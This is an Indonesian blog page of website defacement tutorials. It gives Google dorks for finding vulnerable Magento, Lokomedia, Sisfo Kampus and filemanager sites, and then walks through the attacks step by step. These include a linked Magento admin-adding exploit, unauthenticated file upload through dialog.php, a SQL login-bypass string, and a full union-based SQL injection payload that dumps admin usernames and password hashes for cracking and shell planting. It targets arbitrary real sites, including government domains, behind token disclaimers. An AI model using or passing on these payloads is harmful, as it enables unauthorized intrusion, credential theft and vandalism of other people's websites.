CARA DEFACE WEBSITE TEKNIK MAGENTO ADD ADMIN

Hello World, Please Say Hello Haters :*

kali ini saya akan Share salah satu Bug/Celah pada salah satu CMS eCommerce, yaitu CMS Magento, menggunakan Teknik Add Administrator.

biasanya para carder dan sesepuh Dispenser yang biasa maen Log $_$ , bakal suka nih ama yang berbau cms eshop komersial >.<

 

Bahan :

* Dork

* Exploit magento https://www.thuillierprod.fr/local-magento.php 

* berusaha dan ikhtiyar

Lanjut intip tutornya ;*

1. Dork Magento

inurl:/catalogsearch/term/popular/ "united"
inurl:/catalogsearch/term/popular/ "store"

inurl:/catalogsearch/term/popular/ "mobile"
inurl:/catalogsearch/term/popular/ "shop"
intext:2016 inurl:/dailydeal/
inurl:/catalogsearch/term/popular/ "united"
inurl:/catalogsearch/term/popular/ "shop"
inurl:/catalogsearch/term/popular/ "store"
inurl:/catalogsearch/term/popular/ "mobile"
inurl:/catalogsearch/term/popular/ "2016"

(kembangkan lagi use your kaki eh brain, biar dpt yg vuln n verawan)

2. Dorking di Search Engine
3. buka exploit dan masukin target webmu
 bisa sampai 20 web

 

4. jika sukses lalu login ke admin nya, tinggal nambahin admin di belakang site
http://site/admin 

Kita coba langsung ke page admin Loginnya: target.coli/admin


Dan bismillah

NB: POSTINGAN INI HANYALAH SEBATAS PENGETAHUAN TIDAK BOLEH DISALAH GUNAKAN , BILA TERJADI SESUATU WILOTA.BLOGSPOT.COM/ADMIN TIDAK BERTANGGUNG JAWAB

Read More

Deface teknik SQLi CMS Lokomedia

Dork :
 inurl:/filemanager/ intext:"dialog.php"
 inurl:/js/filemanager/ intext:"dialog.php"
 inurl:/assets/filemanager/ intext:"dialog.php"
Kembangkan Lagi Dorknya   ;)

Exploit ;   localhost /[path]/filemanager/dialog.php

Script Deface Kalian. Ex.HTML

Lanjut Ke Tutorialnya   ;)

1. Masukan Dork Di Search Engine.

2. Pilih Targetnya

3. Lalu Masukan Exploitnya .
 Contoh ; localhost /filemanager/dialog.php
                localhost /[path]/filemanager/dialog.php

4. Lalu Upload File Deface Kalian Di Kotak Merah Ini (Lihat Gambar)

Lalu Klik "Drop Files To Upload" Untuk Mengambil File Deface Kalian.

5. Kalo Sudah Nanti Akan Muncul Berhasil Seperti Ini.

6. File Akses ? Klik Kanan Pada File => Pilih URL File .

7. Dan Lihat Hasilnya   :v
 Selesai   ;) Sumber ? Garuda Security Hacker .

Terima Kasih.

Read More

Deface Teknik Bypass Admin Login Injection

karna yg paling banyak di minati orang adalah deface website.. sudah jelas dengan judul nya "Deface Teknik Bypass Admin Login Injection" Langsung simak aja tutorialnya.

Bahan Bahan :
1. Koneksi Internet
2. Script Deface
3. Dork :
   inurl:/?mnux=login
   "Powered by Sisfo Kampus"

Langsung Aja Yahh :v
1. Masukan Dork Di Google , Yahoo Atau Bing!
2. Pilih Salah Satu Website Yang Mau Di Perawanin :v
3. Masukan Exploitnya.
Contoh : localhost / ?mnux=login

4. Lalu Pilih "Superuser"

5. Setelah Itu Akan Menemukan Panel Login.

 Masukan Username & Password : '=''or'

6. Setelah Itu , Pilih " Master -> Mahasiswa "

7. Nanti Akan Muncul Gambar Seperti Ini.

 Pilih Edit !

8. Klik "Ganti Photo"

9. Upload Script Deface Yang Ektensi .HTML

10. Kalo Sudah , Klik Photonya  >  Klik Kanan  >  Copy Image Address !

 Dan Buka TAB-BAR Baru :* Lalu Paste   :*

Read More

Deface teknik SQLi CMS Lokomedia

karna yg paling banyak di minati orang adalah deface website.. sudah jelas dengan judul nya "Deface teknik SQLi CMS Lokomedia" Langsung simak aja tutorialnya.

Bahan :

1. Dork : 

inurl:statis-1-profil.html

inurl:statis-2-profil.html

inurl:statis-3-strukturorganisasi.html

Note : tambahkan site:org site:net :site:go.id site:ac.id site:id

(Use Your Brain)

2. Exploit SQLi (SQL Injection) :

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Bingung cara ngexploit nya ?? sini di kasih tau :v

contoh : 

http://sitepemerintah.co.li/statis-2-profil.html 

kamu tambahin exploit nya sesudah angka jadi kaya gini :

http://sitepemerintah.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

ngerti kan ??

3. MD5 Decrypter :

MD5 Decrypt nya pake otak kamu sendiri aja :v tenang ada tool online nya kok
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial :

1. Dorking pake dork di atas,

2. Cari targetnya, setelah ketemu masukin inject nya ! seperti contoh di atas

3. Jika Vuln akan ada kode MD5 di tab bar (liat gambar aja biar jelas)

4. Lalu kamu pencet CTRL+U lalu kamu copykan kode MD5 tersebut, lalu decrypt di MD5 Decrypter

5. Tinggal cari dimana tempat login admin nya :) biasanya ada di :
http://target-suka.co.li/admin/
http://target-suka.co.li/adminweb/
http://target-suka.co.li/admininistrator/

6. Untuk Nanem shell ?? User Your Brain Kids !! (Jgn manja)

7. Akses shell ?? setelah nanem shell klik kanan gambar yang ancur lalu klik view image


Note : tapi saya sarankan sebelum melakukan inject terhadap target, lebih baik cari dlu login adminnya :)
postingan ini hanyalah pelajaran semata , jika terjadi apa - apa admin tidak bertanggung jawab

Karena CMS Lokomedia ini dipakai oleh web indonesia, mohon bantuan untuk tidak merusak !!
bikin web itu susah !!!

Read More